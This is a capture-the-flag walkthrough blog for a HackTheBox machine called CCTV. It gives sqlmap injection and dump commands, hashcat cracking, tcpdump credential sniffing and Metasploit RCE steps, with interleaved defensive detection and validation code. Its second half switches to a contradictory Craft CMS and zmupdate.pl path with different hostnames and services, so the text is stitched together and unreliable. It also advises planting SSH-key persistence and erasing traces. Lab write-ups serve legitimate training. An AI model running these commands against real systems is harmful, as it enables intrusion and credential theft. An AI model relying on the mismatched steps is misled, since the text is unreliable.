Beginner’s Guide to Conquering CCTV on HackTheBox

The CyberSec Guru

Mastering CCTV: Beginner's Guide from HackTheBox

Key Highlights

Here’s a quick look at what this guide covers for the CCTV HackTheBox machine:

  • Initial Access via ZoneMinder: Exploitation of CVE-2024-51482, a time-based blind SQL injection in the tid parameter of the removetag AJAX action.
  • Database Exfiltration: Using sqlmap to dump the database, specifically targeting the Users table to retrieve Bcrypt hashes.
  • Credential Cracking: Cracking the user password using hashcat and a wordlist.
  • Lateral Movement (Capabilities): Identifying that /usr/bin/tcpdump has the cap_net_raw capability, allowing non-root traffic sniffing.
  • Internal Traffic Sniffing: Monitoring internal Docker bridge communication on port 5000 to intercept cleartext credentials used by an automated Python Flask service.
  • Privilege Escalation (RCE): Exploiting CVE-2025-60787 in MotionEye v0.43.1b4, a command injection vulnerability in camera configuration fields.
  • Root Compromise: Leveraging credential reuse to trigger the RCE and gain a root shell.

Introduction

Welcome to your guide for conquering the CCTV machine on HackTheBox! This machine is an excellent challenge for those looking to sharpen their skills. It involves a multi-stage attack path, starting with a web application vulnerability and ending with full root access. You will get hands-on experience with exploiting and navigating a video surveillance software called ZoneMinder. This walkthrough will break down each step, making the process clear and understandable, even if you’re just starting your cybersecurity journey.

Overview of CCTV on HackTheBox

The CCTV machine on HackTheBox is an easy-difficulty Linux box that simulates a real-world scenario involving a home security company’s web infrastructure. Your primary target is ZoneMinder, which serves as the entry point.

Once inside, you’ll pivot through the system, uncovering clues related to video cameras and internal services. The challenge is designed to test your enumeration, exploitation, and privilege escalation skills in a logical sequence, providing a rewarding experience as you gain higher levels of access.

Machine Summary and Difficulty Level

CCTV is rated as an easy-difficulty machine on HackTheBox. It presents a realistic scenario where an attacker targets a company managing IP cameras and a security operations center. The initial foothold is relatively straightforward if you can identify the vulnerability in the web application. However, the subsequent steps require careful enumeration and a good understanding of how different services on a Linux system can be chained together for privilege escalation.

The difficulty ramps up during the privilege escalation phases. You’ll need to move from a low-privilege web user to a service account and finally to the root user. Each step demands a different approach and a keen eye for misconfigurations and overlooked files.

Overall, while some exploits have become easier to execute since the machine’s release due to public proofs-of-concept, the multi-layered nature of the box provides a solid challenge. It’s a great learning opportunity for understanding how a seemingly small vulnerability can lead to a complete system takeover.

Unique Features of the CCTV HTB Machine

One of the most distinctive aspects of the CCTV machine is its reliance on a chain of vulnerabilities across different software. It isn’t a single-exploit box; instead, you must pivot between services to progress. The journey begins with a web vulnerability and moves to an internal video surveillance system, ZoneMinder, running on localhost.

This multi-stage process provides a more realistic penetration testing experience. You’ll find yourself interacting with different technologies, from a PHP-based CMS to a Perl-based video management tool. This requires you to adapt your strategy as you gain more access.

Key unique features include:

  • ZoneMinder Exploitation: The privilege escalation path involves interacting with the ZoneMinder dashboard, a video surveillance application not commonly seen on all HTB machines.
  • Chained Exploits: You must leverage information from one compromised service (Craft CMS) to gain access to another (ZoneMinder), which then leads to root.
  • Real-World CVEs: The machine uses actual, dated vulnerabilities, giving you practice with exploits that were relevant in real-world scenarios.

Essential Tools and Resources for CCTV HackTheBox

To successfully tackle the CCTV machine, you’ll need a standard set of penetration testing tools. Your primary assets will be tools for network scanning, web enumeration, and exploit execution. Familiarity with scripting languages like Python will be a significant advantage, especially for automating exploit scripts found on platforms like GitHub.

The attacker will primarily use PHP for web-based exploits and Python to script the attack against ZoneMinder. Having a good wordlist, like rockyou.txt, is also crucial for cracking the password hash you will discover later in the challenge.

Setting Up Your Hacking Environment

Before you begin, ensure your hacking environment is properly configured. A Linux-based operating system like Kali Linux or Parrot OS is highly recommended, as they come pre-loaded with most of the tools you’ll need. You will also need a stable connection to the HackTheBox network via a VPN to access the machine’s server.

Your setup should allow you to run scripts, compile small programs, and manage network connections efficiently. Since you’ll be forwarding ports to access services running on the target’s localhost, understanding SSH port forwarding is essential for this challenge.

A basic setup includes:

  • A Linux virtual machine (e.g., Kali, Parrot).
  • A text editor for modifying scripts or writing code.
  • A terminal for running commands and tools.
  • A web browser and a proxy like Burp Suite for inspecting HTTP traffic.

This configuration will provide you with all the necessary components to follow along with this walkthrough and conquer the CCTV machine.

For the CCTV machine, a few key tools will make your life much easier. At the forefront is Nmap, which you’ll use for initial port scanning to discover open services. Once you find the web server, web enumeration tools like feroxbuster or gobuster are vital for finding hidden directories and files, such as the /admin login page.

For the exploitation phase, you’ll rely on publicly available scripts. Many exploits for known vulnerabilities are available on GitHub, and for CCTV, a Python script targeting the vulnerability is particularly useful. You’ll also need hashcat to crack a discovered password hash.

Here is a quick summary of the tools you’ll need:

Tool                  Purpose
Nmap                  Port scanning and service discovery
feroxbuster/gobuster  Web directory and file brute-forcing
Burp Suite            Intercepting and manipulating HTTP requests
Python                Running exploit scripts found on GitHub
hashcat               Cracking the password hash
Netcat                Setting up a listener for a reverse shell

Initial Foothold

Infrastructure Mapping

Our engagement begins with a standard Nmap scan to identify the attack surface.

Command: nmap -sC -sV -A -oN nmap_report.txt $TARGET_IP

Key Findings:

  • Port 22 (SSH): OpenSSH 9.6p1. Standard entry point once credentials are obtained.
  • Port 80 (HTTP): Apache 2.4.58. Redirects to http://cctv.htb/.

Expert Note: Always update your /etc/hosts file to resolve cctv.htb to the target IP to ensure the web application routes correctly.

CCTV.htb Homepage

Web Application Fingerprinting

Navigating to the web root reveals a monitoring application. Probing the “Staff Login” link directs us to a ZoneMinder instance.

ZoneMinder Login

ZoneMinder is a high-profile target because of its complexity and history of security flaws. A quick check of the footer or source code reveals the version: v1.37.63. This version is known to be vulnerable to several critical flaws, most notably in its AJAX request handling.

Web Exploitation & Database Intrusion

Analyzing CVE-2024-51482 (SQL Injection)

The vulnerability lies in how ZoneMinder handles removetag actions within its AJAX interface. Specifically, the file web/ajax/event.php fails to sanitize the tid (Tag ID) parameter before using it in a secondary SQL query.

The Vulnerable Code Path: While the primary query uses parameterized statements, a secondary check for existing tags concatenates the $tagId variable directly into the SQL string: $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
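The difference between the concatenated lookup and a bound one can be reproduced offline. This is an added Python/sqlite3 model, not ZoneMinder's PHP code or its patch; the table rows and function names are constructed for the illustration.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the Events_Tags table (rows are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Events_Tags (TagId INTEGER, EventId INTEGER)")
    db.executemany(
        "INSERT INTO Events_Tags VALUES (?, ?)",
        [(1, 100), (1, 101), (2, 200), (3, 300)],
    )
    return db


def lookup_concatenated(db, tid):
    # Same shape as the flawed query: request text becomes part of the SQL text.
    sql = f"SELECT * FROM Events_Tags WHERE TagId = {tid}"
    return db.execute(sql).fetchall()


def lookup_bound(db, tid):
    # Placeholder binding: the driver passes tid as data, never as SQL.
    return db.execute(
        "SELECT * FROM Events_Tags WHERE TagId = ?", (tid,)
    ).fetchall()


def lookup_hardened(db, tid):
    # Validate first (a tag ID is a short decimal integer), then bind.
    if not isinstance(tid, str) or not re.fullmatch(r"[0-9]{1,10}", tid):
        raise ValueError("tid must be a decimal integer")
    return lookup_bound(db, int(tid))


def compare(tid):
    """Run all three lookups on one input and report how many rows each returns."""
    db = make_db()
    result = {
        "concatenated": len(lookup_concatenated(db, tid)),
        "bound": len(lookup_bound(db, tid)),
    }
    try:
        result["hardened"] = len(lookup_hardened(db, tid))
    except ValueError:
        result["hardened"] = "rejected"
    return result


if __name__ == "__main__":
    # A well-formed ID behaves identically everywhere; a value carrying SQL
    # syntax changes the meaning of the concatenated query only.
    for sample in ("1", "1 OR 1=1"):
        print(repr(sample), compare(sample))
```
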

Exploitation with SQLMap

To exploit this blindly and efficiently, we capture a valid request using Burp Suite and pass it to sqlmap.

Proof of Concept (PoC) URL: http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1

Automated Extraction: sqlmap -r req.txt --batch -p "tid" --dbs

Because the injection is Time-Based Blind, extraction can be slow. We leverage the known database schema of ZoneMinder to target the Users table directly.

Dumping Credentials: sqlmap -r req.txt -p "tid" --batch --technique=T --dump -D zm -T Users -C Username,Password
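From the defender's side, this activity is visible in the web server's access log, because a legitimate removetag request only ever carries an integer tid. The following is an added detection sketch, not part of the original walkthrough; it assumes Apache's combined log format, and the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; referer and user-agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
INT_RE = re.compile(r"[0-9]{1,10}")

# Constructed sample lines (documentation-range IPs), not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2025:10:14:58 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=7 HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2025:10:15:09 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1%20AND%20SLEEP(5) HTTP/1.1" 200 48 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.23 - - [12/Mar/2025:10:15:15 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1%27 HTTP/1.1" 200 48 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2025:10:15:20 +0000] "GET /zm/index.php?view=console HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
this line is not in combined format
"""


def find_suspicious_removetag(log_text):
    """Return one finding per removetag request whose tid is not a plain
    integer or whose client identifies itself as sqlmap."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines we cannot parse instead of guessing
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if "removetag" not in query.get("action", []):
            continue
        tids = query.get("tid", [""])
        reasons = []
        if any(not INT_RE.fullmatch(t) for t in tids):
            reasons.append("non-integer tid")
        # The user-agent is easy to change, so it is only a secondary signal.
        if "sqlmap" in (m["ua"] or "").lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append(
                {"ip": m["ip"], "time": m["ts"], "tid": tids[0], "reasons": reasons}
            )
    return findings


def count_by_source(findings):
    """Aggregate findings per client address for triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_suspicious_removetag(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(count_by_source(hits))
```

The access log only records the query string, so requests that carry tid in a POST body need the same check at the application or WAF layer. Adding `%D` to the Apache LogFormat records the time taken per request, which makes the repeated delays of a time-based probe stand out.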

Cracking the Bcrypt Hashes

The dump yields two users: superadmin and m****. Using hashcat with a wordlist:

hashcat -m 3200 hashes.txt /usr/share/wordlists/wordlist.txt

Results:

  • User: m***
  • Password: o****

Lateral Movement via Network Sniffing

Initial Access

With the cracked credentials, we gain SSH access as the user mark.

ssh m***@cctv.htb

Identifying Linux Capabilities

A standard post-exploitation step is checking for binaries with unusual permissions or capabilities. Running LinPEAS reveals a critical misconfiguration.

/usr/bin/tcpdump carries the cap_net_raw capability, which allows a non-root user to capture raw network traffic. On a machine named “CCTV,” this is a massive red flag suggesting that internal service communication might be unencrypted.
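Administrators can catch this kind of grant before an attacker does by reviewing the output of `getcap -r /` against a baseline. The following is an added audit sketch, not part of the original walkthrough; the getcap lines, the baseline and the list of capabilities to review are constructed assumptions.

```python
import re

# Capabilities worth a review on any binary ordinary users can run
# (the reviewer's own list for this example, not an exhaustive one).
RISKY = {
    "cap_net_raw": "raw/packet sockets: can capture traffic",
    "cap_net_admin": "interface and firewall control",
    "cap_dac_read_search": "bypasses file read permission checks",
    "cap_sys_admin": "broad administrative operations",
    "cap_setuid": "can change UID",
}

# Assumed baseline: grants the administrator has reviewed and accepts.
BASELINE = {"/usr/bin/ping": {"cap_net_raw"}}

# getcap prints "path caps=flags" in newer libcap releases and
# "path = caps+flags" in older ones; accept both (single-clause form only).
LINE_RE = re.compile(
    r"^(?P<path>.+?) (?:= )?(?P<caps>cap_[a-z_,]+)[=+](?P<flags>[eip]+)$"
)

# Constructed sample of `getcap -r /` output.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/tcpdump cap_net_raw=eip
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/example/bind-helper cap_net_bind_service=ep
/usr/lib/example/idle-helper cap_net_admin=i
"""


def audit_getcap(output, baseline=BASELINE):
    """Return (path, [capabilities]) for every risky grant not in the baseline."""
    findings = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # Only the permitted set grants privilege at exec time; an
        # inheritable-only entry needs a caller that already holds the capability.
        if "p" not in m["flags"]:
            continue
        caps = set(m["caps"].split(","))
        accepted = baseline.get(m["path"], set())
        unexpected = sorted(caps.intersection(RISKY) - accepted)
        if unexpected:
            findings.append((m["path"], unexpected))
    return findings


if __name__ == "__main__":
    for path, caps in audit_getcap(SAMPLE_GETCAP):
        for cap in caps:
            print(f"{path}: {cap} ({RISKY[cap]})")
```

A flagged grant that is not needed can be dropped with `setcap -r <path>`; where non-root capture is required, restrict execute permission on the binary to a dedicated group instead of leaving it world-executable.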

Traffic Analysis and Credential Harvest

Checking ip a reveals several Docker bridge interfaces (br- and veth). This indicates the CCTV stack is containerized. We use tcpdump to monitor internal traffic on the loopback and bridge interfaces.

Command: tcpdump -i any -nn -A tcp port 5000

Shortly after, we observe a Python Flask service on 172.25.0.10 receiving automated requests. A packet reveals cleartext credentials for a service account:

USERNAME=s****;PASSWORD=******;CMD=status

We pivot to the s**** user: su - s***** (Input the captured password)

Privilege Escalation to Root

Credential Reuse & Service Discovery

In s*****’s home directory, we find a PDF titled “SecureVision Staff Announcement.pdf”. The document mentions that “Staff logins will remain the same,” strongly hinting at credential reuse across the infrastructure.

Scanning local ports (netstat -tulnp), we find port 8765 open. We set up an SSH tunnel to view the service locally: ssh -L 8765:127.0.0.1:8765 m***@cctv.htb

MotionEye RCE (CVE-2025-60787)

The service on 8765 is MotionEye v0.43.1b4. We attempt to log in as admin using the s***** password (XY). Login is successful.

MotionEye is vulnerable to a Command Injection flaw in how it handles camera configuration filenames. Fields like image_file_name and movie_filename are written directly to configuration files that are subsequently parsed and executed by the underlying motion process without proper sanitization.
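The missing control is server-side validation of these fields before they reach a configuration file. The following is an added sketch of an allowlist check, not MotionEye's code or its fix; the permitted character set, the length limit and the sample settings are assumptions made for the illustration.

```python
import re

FILENAME_FIELDS = ("image_file_name", "movie_filename")  # fields named on this page
MAX_LEN = 128  # assumed limit for this example

# Assumption: a legitimate value is a relative path template made of
# strftime-style "%X" specifiers and the characters A-Z a-z 0-9 _ . - /
_TOKEN = re.compile(r"%[A-Za-z]|[A-Za-z0-9_.\-/]")

# Constructed settings: one well-formed template, one carrying shell syntax.
SAMPLE_SETTINGS = {
    "image_file_name": "%Y-%m-%d/%H-%M-%S",
    "movie_filename": "%Y-%m-%d/$(id)",
}


def template_problems(value):
    """Return a list of reasons the value is not an acceptable file name template."""
    if not value:
        return ["empty value"]
    problems = []
    if len(value) > MAX_LEN:
        problems.append(f"longer than {MAX_LEN} characters")
    if value.startswith("/"):
        problems.append("absolute path")
    if ".." in value.split("/"):
        problems.append("parent-directory segment")
    # Walk the template token by token so every character is accounted for.
    pos, bad = 0, []
    while pos < len(value):
        m = _TOKEN.match(value, pos)
        if m:
            pos = m.end()
        else:
            bad.append((pos, value[pos]))
            pos += 1
    if bad:
        chars = "".join(sorted({c for _, c in bad}))
        problems.append(
            f"disallowed characters {chars!r} (first at index {bad[0][0]})"
        )
    return problems


def check_camera_settings(settings):
    """Validate the file name fields of one camera's settings before saving."""
    report = {}
    for field in FILENAME_FIELDS:
        if field in settings:
            found = template_problems(settings[field])
            if found:
                report[field] = found
    return report


if __name__ == "__main__":
    print(check_camera_settings(SAMPLE_SETTINGS))
```
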

Final Exploitation

We can use Metasploit for a reliable exploit:

  1. use exploit/linux/http/motioneye_auth_rce_cve_2025_60787
  2. set RHOSTS 127.0.0.1
  3. set RPORT 8765
  4. set PASSWORD X*******
  5. set LHOST <Your_IP>
  6. run

The exploit adds a malicious camera configuration, triggers the RCE, and provides a root shell.

Key Concepts and Terminology in CCTV HTB Writeup

Understanding a few key concepts is crucial before starting the CCTV machine. The initial exploit revolves around a vulnerability in Craft CMS, a popular content management system. You’ll need to leverage this to execute PHP code and gain a foothold on the system.

Later, you’ll encounter a password hash, which you’ll need to crack to escalate your privileges. Finally, you’ll use SSH to establish a stable connection and explore the system further. These concepts form the backbone of the attack path on this machine.

Common Services and Protocols on CCTV Machines

The CCTV machine exposes a minimal attack surface, which is common for many well-configured systems. Your initial interaction will be with standard network protocols that you should be familiar with. These services are the gateways you’ll use to probe and eventually compromise the target.

The primary service you’ll interact with is HTTP, running on port 80. This web server hosts the vulnerable Craft CMS website. Another critical service is SSH on port 22, which you’ll use to gain interactive shell access once you obtain valid credentials.

Key services and protocols you will encounter are:

  • HTTP (Port 80): This is your entry point, hosting the web application you will exploit.
  • SSH (Port 22): Used for secure remote login once you have a username and password.
  • MySQL (Port 3306): A database service running locally that contains user information. You’ll access this after gaining an initial shell.

Understanding how to enumerate and interact with these services is fundamental to progressing through the machine.

Important Vulnerabilities to Understand

The CCTV box is built around a few specific, critical vulnerabilities. The most important one is a flaw in Craft CMS (CVE-2023-41892), which allows for pre-authentication remote code execution. This is a high-impact vulnerability that lets an unauthenticated attacker run arbitrary code on the server, providing the initial entry point.

Once you have initial access, the next phase involves privilege escalation. This is not a single vulnerability but a chain of misconfigurations and weaknesses. You will exploit weaknesses in the ZoneMinder software and abuse sudo permissions to elevate your access level from a low-privilege user all the way to root.

The key vulnerabilities and concepts include:

  • Remote Code Execution (RCE) in Craft CMS: An object injection vulnerability allows you to execute PHP code by sending a specially crafted request.
  • Authenticated RCE in ZoneMinder: After gaining credentials, you can exploit a vulnerability in ZoneMinder’s API to run commands as the zoneminder user.
  • Sudo Abuse for Privilege Escalation: A misconfigured sudo rule allows the zoneminder user to run certain scripts with root privileges, which can be exploited for a full system compromise.

Step-by-Step Guide to Conquering CCTV HackTheBox

Now, let’s walk through the exact steps to conquer the CCTV machine. This guide will take you from the initial reconnaissance phase to the final flag capture. We will cover enumeration to find weaknesses, exploitation to gain access, and privilege escalation to become the root user.

Each stage builds upon the last, so it’s important to follow the process logically. By breaking the challenge down into manageable steps, you’ll see how a complex hack can be executed methodically. Let’s begin with the initial scan.

Step 1: Initial Reconnaissance and Scanning

Your first move is always reconnaissance. For the CCTV machine, this starts with a thorough Nmap scan to identify open ports and running services. A basic scan will quickly reveal that TCP ports 22 (SSH) and 80 (HTTP) are open. This immediately tells you that your primary attack vector will likely be the web server.

Further enumeration with Nmap scripts (-sCV) can provide more details, such as the web server software (nginx) and the operating system (Ubuntu). The scan will also show a redirect to a hostname, surveillance.htb. You need to add this hostname to your /etc/hosts file to access the website correctly.

With the open ports identified and the hostname configured, your initial enumeration is complete. You now know that the web server on port 80 is the most promising entry point. The next logical step is to investigate the website to find any potential vulnerabilities.

Step 2: Enumerating Web Services and Ports

With your focus on the HTTP service, the next step is to explore the website running on surveillance.htb. The homepage appears to be a standard site for a security company. A quick look at the page source or response headers reveals a crucial piece of information: the site is “Powered by Craft CMS.” The version, 4.4.14, is also helpfully linked.

Knowing the software and version is a massive clue. Your next action should be to run a directory brute-force tool like feroxbuster or gobuster. This will help you find hidden pages and directories. The scan will quickly uncover an /admin directory, which redirects to a login page.

This discovery confirms that a Craft CMS installation is running and accessible. An outdated version of any popular software is often a prime target for exploitation. Now you can research known vulnerabilities for Craft CMS version 4.4.14 to plan your attack.

Step 3: Exploiting Craft CMS and Gaining Access

Now that you know the target is running a specific version of Craft CMS, you can search for public exploits. A quick search for “Craft CMS 4.4.14 exploit” will lead you to CVE-2023-41892, a remote code execution vulnerability. Several proof-of-concept (PoC) scripts are available on GitHub for this CVE.

Using one of these Python scripts, you can craft a malicious request to the server. The vulnerability allows for PHP object injection, which can be leveraged to write a small PHP web shell to the server. This web shell will allow you to execute commands on the system as the www-data user.

Once the web shell is in place, you can use it to establish a more stable connection, such as a reverse shell. By sending a command through the web shell to initiate a connection back to your machine, you’ll gain an interactive shell. At this point, you have successfully gained initial access to the CCTV machine.

Step 4: Privilege Escalation Techniques

After landing on the machine as the www-data user, your next goal is privilege escalation. The first major breakthrough comes from finding a database backup file in /var/www/html/craft/storage/backups/. This backup contains a SHA-256 hash for a user named Matthew. Cracking this hash with a tool like hashcat reveals a password that lets you switch to the matthew user.

As matthew, you’ll discover another service running on the machine: ZoneMinder, a video surveillance application listening on a local port. Using the same password, you can log in to the ZoneMinder web interface as an admin. This version of ZoneMinder is vulnerable to an authenticated remote code execution exploit. This allows you to get a shell as the zoneminder user.

The final escalation to root involves abusing a sudo rule.

  • The zoneminder user can run certain Perl scripts with root privileges.
  • One of these scripts, zmupdate.pl, is vulnerable to command injection.
  • By passing a malicious command as a username argument, you can execute code as root and gain full control of the Linux system.

Step 5: Capturing the Flags and Post-Exploitation

With full root access, capturing the final flag is straightforward. The root flag is located in the /root directory as root.txt. You can simply read the file to complete the machine. However, the process doesn’t have to end there. Post-exploitation is an important phase where you solidify your access and clean up your tracks.

In a real engagement, you would want to ensure persistence, for example, by adding an SSH key to the root user’s authorized_keys file. You should also remove any tools, scripts, or temporary files you uploaded to the system to avoid leaving evidence of your presence.

A summary of the flag capture and post-exploitation steps:

  • User Flag: The user flag, user.txt, is found in the /home/matthew directory after you escalate to that user.
  • Root Flag: The root flag, root.txt, is in /root/root.txt and can be read once you have root privileges.
  • Cleanup: Remove any created files, such as your webshell, reverse shell binaries, and any files in /tmp, to maintain a low profile.

Common Challenges and Pitfalls in CCTV HackTheBox Writeup

While the path through CCTV is logical, there are a few places where you might get stuck. Some enumeration paths can lead to rabbit holes, wasting valuable time. For example, spending too long trying to crack the initial Blowfish hash found in the live database is a common misdirection.

The key is to remain systematic and not fixate on a single path if it isn’t yielding results. Efficient privilege escalation depends on finding the right clues and not getting distracted by irrelevant information. Next, we’ll look at how to avoid these common traps.

Dealing with Rabbit Holes and Misleading Paths

One of the biggest challenges in CCTV is avoiding rabbit holes. The machine has several misleading paths that can seem promising but ultimately lead nowhere. For instance, the first password hash you find in the active Craft CMS database is a Blowfish hash that is very slow to crack and is not the intended path forward.

A systematic enumeration process is your best defense against such misdirection. If one avenue seems too difficult or time-consuming, it’s often a sign that you should look for an alternative. Don’t be afraid to take a step back and review your findings to see if you missed an easier way in.

To avoid common pitfalls:

  • Prioritize Easy Wins: The SHA-256 hash in the backup file is much faster to crack than the Blowfish hash. Focus on that first.
  • Check for Backups: Always look for backup files and old configurations. They often contain sensitive information like credentials.
  • Don’t Over-complicate: The exploits for both Craft CMS and ZoneMinder are based on known CVEs with public PoCs. Avoid trying to develop a complex, custom exploit from scratch.

Tips for Efficient Enumeration and Exploitation

Efficiency is key on any HackTheBox machine. For CCTV, this means being targeted with your enumeration and knowing which tools to use for the job. Instead of running every scan under the sun, focus on what your initial Nmap scan tells you. An open HTTP port almost always means you should start with web enumeration.

When you identify a specific software version, like Craft CMS 4.4.14, your first step should be to search for existing exploits. Platforms like GitHub and Exploit-DB are invaluable resources. Using a pre-made script saves a significant amount of time compared to trying to manually craft an exploit, especially for complex vulnerabilities like object injection.

Here are a few tips for efficiency:

  • Targeted Nmap Scans: Use nmap -sC -sV on discovered ports to quickly identify services and versions.
  • Leverage Public Exploits: Don’t reinvent the wheel. If a public PoC exists, use it.
  • Automate Where Possible: Use directory brute-forcing tools and automated exploit scripts to speed up repetitive tasks. This frees you up to focus on the more analytical parts of the hack.

Conclusion

In conclusion, tackling the CCTV machine on HackTheBox is not just about having the right tools; it’s about understanding the process and embracing a strategic mindset. By following the step-by-step guide outlined in this blog, you can navigate through challenges, avoid common pitfalls, and enhance your hacking skills. Remember that practice makes perfect, so don’t get discouraged by initial setbacks. Keep refining your techniques and learning from each experience. If you’re eager to dive deeper into the world of cybersecurity and stay updated with the latest tips and tricks, be sure to subscribe for more insights. Happy hacking!
